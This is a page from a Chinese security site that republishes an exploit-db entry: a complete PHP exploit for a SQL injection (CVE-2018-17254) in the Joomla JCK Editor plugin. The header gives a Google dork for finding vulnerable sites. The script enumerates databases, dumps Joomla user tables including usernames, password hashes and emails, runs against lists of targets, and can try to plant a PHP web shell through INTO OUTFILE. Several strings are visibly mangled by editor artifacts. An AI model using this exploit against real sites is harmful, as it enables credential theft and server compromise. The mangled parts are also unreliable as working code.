首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Joomla JCK Editor 6.4.4 - 'parent' SQL Injection
来源:exploit-db.com 作者:Ferreira 发布时间:2021-03-12  
# Exploit Title: Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)
# Googke Dork: inurl:/plugins/editors/jckeditor/plugins/jtreelink/
# Date: 05/03/2021
# Exploit Author: Nicholas Ferreira
# Vendor Homepage: http://docs.arkextensions.com/downloads/jck-editor
# Version: 6.4.4
# Tested on: Debian 10
# CVE : CVE-2018-17254
# PHP version (exploit): 7.3.27
# POC: /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa

<?php

$vuln_file = '/editors/jckeditor/plugins/jtreelink/dialogs/links.php';

function payload($str1, $str2=""){
	return '?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,'.$str1.',NULL,NULL,NULL,NULL,NULL'.$str2.'--%20aa'; #"
}


function get_request($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
	#curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8080");
    $output = curl_exec($ch);
    curl_close($ch);
    return $output;
}

function parse_columns($columns){
	$parsed_columns = array();
	foreach($columns as $col){
		array_push($parsed_columns, $col);
		array_push($parsed_columns, "0x242324"); //delimiter = $#$
	}
	return $parsed_columns;
}

function inject($url, $payload){
	global $vuln_file;
	$request = get_request($url.$vuln_file.$payload);
	preg_match_all('/url ="(.*)">/', $request, $output);
	return $output;
}
######

function is_vulnerable($url){
	global $vuln_file;
	$output = inject($url, payload("0x6861636b6564"));
	if(isset($output[1][0])){
		if(base64_encode($output[1][0]) == "aGFja2Vk"){ //checking if we can inject
			return 1;
		}
	}
	return 0;
}

function get_db_names($url){
	global $vuln_file;
	$db_names = array();
	$output = inject($url, payload("schema_name", "%20from%20information_schema.schemata"));
	foreach($output[1] as $db){
		array_push($db_names, $db);
	}
	return $db_names;
}

function get_table_names($url, $db){
	global $vuln_file;
	$table_names = array();
	$output = inject($url, payload("table_name", "%20from%20information_schema.tables%20WHERE%20table_schema=%27".$db."%27"));
	foreach($output as $table){
		array_push($table_names, $table);
	}
	return $table_names;
}

function get_column_names($url, $table){
	global $vuln_file;
	$column_names = array();
	$output = inject($url, payload("column_name", "%20from%20information_schema.columns%20WHERE%20table_name=%27".$table."%27"));
	foreach($output as $column){
		array_push($column_names, $column);
	}
	return $column_names;
}

function dump_columns($url, $columns, $dbname, $table){
	global $vuln_file;
	$column_dump = array();
	$related_arr = array();
	$data = array();
	$output = inject($url, payload("concat(".implode(',', parse_columns($columns)).")", "%20from%20".$dbname.".".$table));
	foreach($output[1] as $column){
		$exploded = explode("$#___FCKpd___0quot;, $column);
		array_push($data, $exploded);
	}
	foreach($data as $user_info){
		array_pop($user_info);
		array_push($related_arr, array_combine($columns, $user_info));
	}
	return $related_arr;
}

function rce($url){	//probably won't work =(
	global $vuln_file;
	if(!is_vulnerable($url)){
		die(red("[-] Target isn't vulnerable."));
	}
	$server_root = array("/var/www/", "/var/www/html/", "/usr/local/apache2/htdocs/", "/var/www/nginx-default/", "/srv/www/", "/usr/local/apache2/htdocs/");
	$rand_content = "AklOGg8kJ7GfbIuBYfDS2apD4L2vADk8QgODUg2OmDNy2";
	$payl0ad = "'<?php system(\
___FCKpd___0
GET[0]); ?> ".$rand_content."'"; $filename = rand(1000, 7359).".php"; echo cyan("[i]")." Trying to upload a RCE shell...\n"; foreach($server_root as $path){ inject($url, payload($payl0ad, " INTO OUTFILE '".$path.$filename."'")); } $get_shell = get_request($url."/".$filename); if(strpos($get_shell, $rand_content) !== false){ echo green("[+] RCE shell successfully uploaded! =)\n"); die("Usage: ".$url."/".$filename."?0=whoami\n"); }else{ echo(red("[-] ")."Could not upload RCE shell. Maybe stacked queries are not supported. =(\n"); die(cyan("[i] ")."But you can still inject SQL commands! What about dumping the users table? =)\n"); } } function read_file($url, $file){ global $vuln_file; } ############ function green($str){ return "\e[92m".$str."\e[0m"; } function red($str){ return "\e[91m".$str."\e[0m"; } function yellow($str){ return "\e[93m".$str."\e[0m"; } function cyan($str){ return "\e[96m".$str."\e[0m"; } function banner(){ echo " ___ _____ _ __ _____ |_ |/ __ \| | / /| _ \ | || / \/| |/ / | | | | _ _ _ __ ___ _ __ ___ _ _ | || | | \ | | | || | | || '_ ` _ \ | '_ \ / _ \| '__| /\__/ /| \__/\| |\ \| |/ / | |_| || | | | | || |_) || __/| | \____/ \____/\_| \_/|___/ \__,_||_| |_| |_|| .__/ \___||_| ".green("Coder: ").yellow("Nicholas Ferreira")." | | |_| "; } $target = 0; $rce = 0; function check(){ global $argv; global $argc; global $target; global $rce; global $target_list; global $save_output; global $verbose; global $less; global $specified_db; $short_args = "u:t:v::h::l::r::d::"; $long_args = array("url:","targets::","verbose::","help::","less::","rce::", "db::"); $options = getopt($short_args, $long_args); if(isset($options['h']) || $argc == 1 || isset($options['help'])){ echo "JCK Editor v6.4.4 SQL Injection exploit (CVE-2018-17254) Usage: php ".$argv[0]." -u url [-h] [-v] [-l] [-o] [-r command] [-f list_of_targets] [-d db] -u, --url: Path to Joomla! plugins (e.g. website.com/site/plugins/) -h, --help: Help -v, --verbose: Verbose mode (print tables) -l, --less: Less outputs (only Administrator usernames and passwords) -t, --targets: Load a list of targets -r, --rce: Try to upload a RCE shell -d, --db: Specifies the DB to dump "; } if(isset($options['u'])){ $target = $options['u']; }elseif(isset($options['url'])){ $target = $options['url']; }else{ $target = ""; } isset($options['v']) || isset($options['verbose']) ? $verbose = 1 : $verbose = 0; isset($options['l']) || isset($options['less']) ? $less = 1 : $less = 0; isset($options['r']) || isset($options['rce']) ? $rce = 1 : $rce = 0; isset($options['f']) ? $target_list = $options['f'] : $target_list = 0; if(isset($options['t'])){ $target_list = $options['t']; }elseif(isset($options['targets'])){ $target_list = $options['targets']; }else{ $target_list = 0; } if(isset($options['d'])){ $specified_db = $options['d']; }elseif(isset($options['db'])){ $specified_db = $options['db']; }else{ $specified_db = 0; } if(strlen($target_list) < 2){ if($target !== ""){ // check if URL is ok if(!preg_match('/^((https?:\/\/)|(www\.)|(.*))([a-z0-9-].?)+(:[0-9]+)?(\/.*)?$/', $target)){ die(red("[i] The target must be a URL.\n")); } if(strpos($target, "plugins") == false){ die(red("[-] You must provide the Joomla! plugins path! (standard: exemple.com/plugins/)\n")); } }else{ die(cyan("[-] ")."You can get help with -h.\n"); } } if($target_list !== 0){ //check if target list is readable if(!file_exists($target_list)){ die(red("[-] ")."Could not read target list file.\n"); } } } function exploit($url){ // returns users and passwords global $vuln_file; global $verbose; global $rce; global $specified_db; global $less; echo cyan("\n=========================| ".str_replace("plugins", "", $url)." |=========================\n\n\n"); echo cyan("[+] ")."Checking if target is vulnerable...\n"; if (is_vulnerable($url)){ $main_db = inject($url, payload("database()"))[1]; $user_table = ""; $hostname = inject($url, payload("@@hostname"))[1]; $mysql_user = inject($url, payload("user()"))[1]; $mysql_version = inject($url, payload("@@version"))[1]; $connection_id = inject($url, payload("connection_id()"))[1]; echo green("[+] Target is vulnerable! =)\n\n"); echo cyan("[i] ")."Hostname: ".yellow($hostname[0])."\n"; echo cyan("[i] ")."Current database: ".yellow($main_db[0])."\n"; echo cyan("[i] ")."MySQL version: ".yellow($mysql_version[0])."\n"; echo cyan("[i] ")."MySQL user: ".yellow($mysql_user[0])."\n"; echo cyan("[i] ")."Connection ID: ".yellow($connection_id[0])."\n\n"; if($rce){ rce($url); } echo cyan("[+] ")."Getting DB names...\n"; $dbs = get_db_names($url); if(count($dbs) == 0){ echo("[-] There are no DBs available on this target. =(\n"); } $db_list = array(); foreach($dbs as $db){ $num_table = count(get_table_names($url, $db)[1]); echo green("[+] DB found: ").cyan($db." [".$num_table." tables]")."\n"; array_push($db_list, $db); } if($main_db == "" && !$specified_db){ echo(red("[-] Could not find Joomla! default DB. Try to dump another DB with -d. \n")); } if($specified_db !== 0){ // if user doesn't specify a custom db echo cyan("\n[+] ")."Getting tables from ".yellow($specified_db)."...\n"; $tables = get_table_names($url, $specified_db); }else{ foreach($db_list as $new_db){ if($new_db !== "test" && strlen(strpos($new_db, "information_schema") !== false) == 0){ // neither test nor i_schema echo cyan("\n[+] ")."Getting tables from ".yellow($new_db)."...\n"; $tables = get_table_names($url, $new_db); } } } echo cyan("[+] ").yellow(count($tables[1]))." tables found! \n"; if(count($tables[1]) == 0){ echo(red("[-] "."Site is vulnerable, but no tables were found on this DB. Try to dump another DB with -d. \n")); } foreach($tables[1] as $table){ if($verbose) echo $table."\n"; if(strpos($table, "_users") !== false){ $user_table = $table; } } if($user_table == ""){ echo(red("[-] Could not find Joomla default users table. Try to find it manually!\n")); } echo cyan("[+] ")."Getting columns from ".yellow($user_table)."...\n"; $columns = get_column_names($url, $user_table); if(count($columns) == 0){ echo(red("[-] There are no columns on this table... =(\n")); } if($verbose){ echo cyan("[+] ")."Columns found:\n"; foreach($columns[1] as $coll){ echo $coll."\n"; } } echo cyan("[+] ")."Dumping usernames from ".yellow($user_table)."...\n"; $dump = dump_columns($url, array("id","usertype", "name","username","password","email","lastvisitDate"), $db, $user_table); if(is_array($dump) && count($dump) == 0){ $new_dump = dump_columns($url, array("id","name","username","password","email","lastvisitDate"), $db, $user_table); if(count($new_dump) == 0){ echo(red("[-] This table is empty! =(\n")); }else{ $dump = $new_dump; $usertype = 0; } }else{ $usertype = 1; } echo cyan("\n[+] ")."Retrieved data:\n"; foreach($dump as $user){ if($usertype){ $adm = strpos($user['usertype'], 'Administrator') !== false; }else{ $adm = false; } if($less){ if(strpos($user['usertype'], "Administrator") !== false){ echo "\n=============== ".green($user['username'])." ===============\n"; foreach($user as $key => $data){ if(strlen($data) > 0){ if($key == "username" || $key == "password" || $adm){ echo($key.": ".red($data)."\n"); }else{ echo($key.": ".$data."\n"); } } } } }else{ echo "\n=============== ".green($user['username'])." ===============\n"; foreach($user as $key => $data){ if(strlen($data) > 0){ if($key == "username" || $key == "password" || $adm){ echo($key.": ".red($data)."\n"); }else{ echo($key.": ".$data."\n"); } } } } } echo(green("\nExploit completed! =)\n\n\n")); }else{ echo(red("[-] Apparently, the provided target is not vulnerable. =(\n\n")); echo(cyan("[i] ")."This may be a connectivity issue. If you're persistent, you can try again.\n"); } } banner(); check(); if(strlen($target_list) >1){ $targets = explode(PHP_EOL, file_get_contents($target_list)); //split by newline foreach($targets as $website){ if($rce){ rce($target); }else{ if(strlen($website) > 1){ exploit($website); //multiple targets } } } }else{ exploit($target); //single target } ?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·Yahoo! Messenger Webcam 8.1 Ac
·VideoScript 3.0 <= 4.0.1.50 Of
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Hotel and Lodge Management Sys
·Golden FTP Server 4.70 - 'PASS
·AnyDesk 5.5.2 - Remote Code Ex
·Zen Cart 1.5.7b - Remote Code
·Tiny Tiny RSS - Remote Code Ex
·Covid-19 Contact Tracing Syste
·Online Catering Reservation Sy
·VMware vCenter Server 7.0 - Un
·WiFi Mouse 1.7.8.5 - Remote Co
·FortiLogger 4.4.2.2 - Unauthen
·VMware vCenter 6.5 / 7.0 Remot
·Remote Desktop Web Access - Au
  推荐广告
CopyRight © 2002-2021 VFocuS.Net All Rights Reserved